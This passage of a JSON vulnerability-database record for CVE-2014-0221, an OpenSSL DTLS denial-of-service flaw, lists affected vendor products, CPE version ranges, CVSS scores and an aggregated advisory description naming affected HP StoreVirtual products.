0.3, "vendor": "ibm", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "usg9500 usg9500 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "s2750\u0026s5700\u0026s6700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oic v100r001c00spc402", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.0" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "s7700\u0026s9700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "dsr-1000 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "oceanstor s5500t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "espace u2980 v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.1880" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence ip vcr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "documentum content server sp1 p26", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "eupp v100r001c01spc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ecns600 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "oceanstor s2600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v29.7" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "ave2000 v100r001c00sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "documentum content server sp2 p15", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.5" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vpn client v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "metro ethernet series access devices", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "12000" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "ace application control engine appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.01" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "project openssl 1.0.0m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dsr-500n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "security network intrusion prevention system gx5008-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "nip2000\u00265000 v100r002c10spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.8.0" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "eupp v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "dsr-500 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "oceanstor s5800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69000" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "oceanstor s5600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "big-ip edge clients for windows", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7101" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security module for cisco network registar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "project openssl 0.9.8za", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "s6900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "dsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "css series content services switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "115000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "oceanstor s5800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "s7700\u0026s9700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "9.3-beta1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "espace usm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" } ], "sources": [ { "db": "BID", "id": "67901" }, { "db": "CNNVD", "id": "CNNVD-201406-079" }, { "db": "NVD", "id": "CVE-2014-0221" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.0m", "versionStartIncluding": "1.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.1h", "versionStartIncluding": "1.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.9.8za", "versionStartIncluding": "0.9.8", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mariadb:mariadb:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.0.13", "versionStartIncluding": "10.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0221" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "127421" }, { "db": "PACKETSTORM", "id": "127159" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "128001" } ], "trust": 0.7 }, "cve": "CVE-2014-0221", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2014-0221", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0221", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201406-079", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-0221", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0221" }, { "db": "CNNVD", "id": "CNNVD-201406-079" }, { "db": "NVD", "id": "CVE-2014-0221" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake. OpenSSL is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application, denying service to legitimate users. \nOpenSSL prior to 0.9.8za,1.0.0m and 1.0.1h are vulnerable. These vulnerabilities include: \n\n* The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"POODLE\", which could be exploited remotely\nresulting in disclosure of information. \n\n - HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2010-5298\n 4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\n 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)\n\n CVE-2014-0076\n 4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n 1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2014-0195\n 7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0198\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0221\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0224\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-3470\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 